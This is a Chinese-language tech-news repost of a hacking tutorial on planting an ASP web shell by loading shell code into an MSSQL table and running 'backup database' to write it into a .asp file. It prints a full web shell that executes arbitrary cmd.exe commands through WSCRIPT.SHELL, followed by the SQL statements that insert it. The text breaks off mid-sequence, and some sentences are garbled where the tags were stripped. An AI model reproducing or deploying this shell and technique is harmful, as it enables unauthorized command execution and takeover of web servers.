首页>
技术资讯>
详情

在MSSQL下实现Backup a shell的步骤

2016-06-18 来源:CloudBest 阅读量: 272
关键词: 应用技术


  最早想到利用数据库系统来写文件大约是在看到MySQL相关文章的时候,我记得有篇经典的贴子是讲利用TCP反弹结合输入法漏洞入侵的,第一步,也是很重要的一步就是利用了MySQL导出表到文件获得了一个web上的shell。回过头来我想,ACCESS功能不那么强大,有注入漏洞的时候也不能直接获得执行任何命令的权限,就不去看了(事实上还是可以……);MSSQL倒是有很多人详细研究过,执行命令的方法罗列了很多,可是没有了exec的权限,所做的还是有限。很多人就在问,MSSQL下面能不能导出一张表到文件,就像MySQL那样子,至少先获得一个低权限的shell来看看,我找来找去也没有找到导出表的命令,只好退而求其次——不能导出表,那就只好导出数据库了。
  
  在说明做法前,还是先来看看为什么可以。IIS在通过asp.dll处理.asp扩展名文件的时候,对以外的内容,不做任何处理就直接输出,比如拷贝一个.exe文件到web发布目录,改扩展名为.asp后在IE中请求,返回来的结果是多半是.exe文件的内容,而不会是一个500服务器内部错误。而对于括起来的内容,默认情况下是按照VBScripts的方式解释执行后给出结果,如果在里面的内容有语法错误,才会出现常见的500服务器内部错误。换句话说,如果有一个以.asp为扩展名的文件,只要能精心控制所有的中的内容,我们就能够让它正确的执行,而至于以外的东西,asp.dll不去处理它,我们也不去关心。(这个有点像我朋友在做的预处理,外的就像是注释,里面的东西才被解释执行然后返回结果)
  
  再来看看在MSSQL下使用backup database的情况。随便导出一个数据库看看,比如model,当然了,可以在查询分析器中做:
  
  backup database model to disk='c:\a.txt'
  
  用文本的方式打开这个文件,查找是否存在,呵呵,显然是没有的吧。通过上面的分析,我们知道,如果把这个文件改扩展名为.asp后,请求时不会出现问题,也就是说我们的请求会返回文本方式的内容。默认的导出文件不会导致解释执行时的错误,这是很关键的一步。下面我们要让他变为一个shell,方法自然是做一个表进去,表的内容在备份的时候一定会被存储到备份文件中去的,我们可以控制表的内容,自然也可以控制备份文件的内容。
  
  到这里可能有人已经想一股脑儿把经典的asp shell的内容写入新建的表然后backup database了,嗯,还没有那么简单,你这样做了的话,如果还想继续我们的实验,那可能要花上重装MSSQL的代价。对于文本类型等的数据,比如text,nvchar等,在数据库中可能的形式是“abc”,但是在导出文件中,已经变成了宽字符的形式,成了“a b c ”,这样子的话,即使你好心写的是一个“,这样子,我们才能完全的控制内的内容,保证能够得到一个正确无误的asp shell。
  
  OK,终于到了实践的部分了。通过上面的分析,应该知道利用backup database来做一个shell是完全可行的,我们先来改写一下那个利用FSO的asp shell,使其能够符合我们的要求:
  
  <% Dim oScript %>
  
  <% Dim oScriptNet%>
  
  <% Dim oFileSys, oFile%>
  
  <% Dim szCMD, szTempFile%>
  
  <% Set oScript = Server.CreateObject("WSCRIPT.SHELL")%>
  
  <% Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")%>
  
  <% Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")%>
  
  <% szCMD = Request.Form(".CMD")%>
  
  <% If (szCMD <> "") Then%>
  
  <% szTempFile = "C:\" & oFileSys.GetTempName()%>
  
  <% Call oScript.Run ("cmd.exe /c " & szCMD & "
  > " & szTempFile, 0, True)%>
  
  <% Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)%>
  
  <% End If %>
  
  <HTML><BODY><FORM action="<%= Request.ServerVariables("URL")
  %>" method="POST">
  
  <input type=text name=".CMD" size=45 value="<%= szCMD
  %>"><input type=submit value="Run"></FORM><PRE>
  
  <% If (IsObject(oFile)) Then%>
  
  <% On Error Resume Next%>
  
  <% Response.Write Server.HTMLEncode(oFile.ReadAll)%>
  
  <% oFile.Close%>
  
  <% Call oFileSys.DeleteFile(szTempFile, True)%>
  
  <% End If%>
  
  </BODY></HTML>
  
  然后打开查询分析器,依次输入以下的SQL查询语句。这些语句的大意就是创建一张表,里面有一个二进制image类型的列,然后把我们上面改写的那个shell作为内容输进去,最后导出整个数据库到一个.asp文件,开始!
  
  use model
  
  create table cmd (str image);
  
  insert into cmd(str) values ('<% Dim oScript %>');
  
  insert into cmd(str) values ('<% Dim oScriptNet%>');
  
  insert into cmd(str) values ('<% Dim oFileSys, oFile%>');
  
  insert into cmd(str) values ('<% Dim szCMD, szTempFile%>');
  
  insert into cmd(str) values ('<% Set oScript = Server.CreateObject("WSCRIPT.SHELL")%>');
  
  insert into cmd(str) values ('<% Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")%>');
  
  insert into cmd(str) values ('<% Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")%>');

热门推荐 查看更多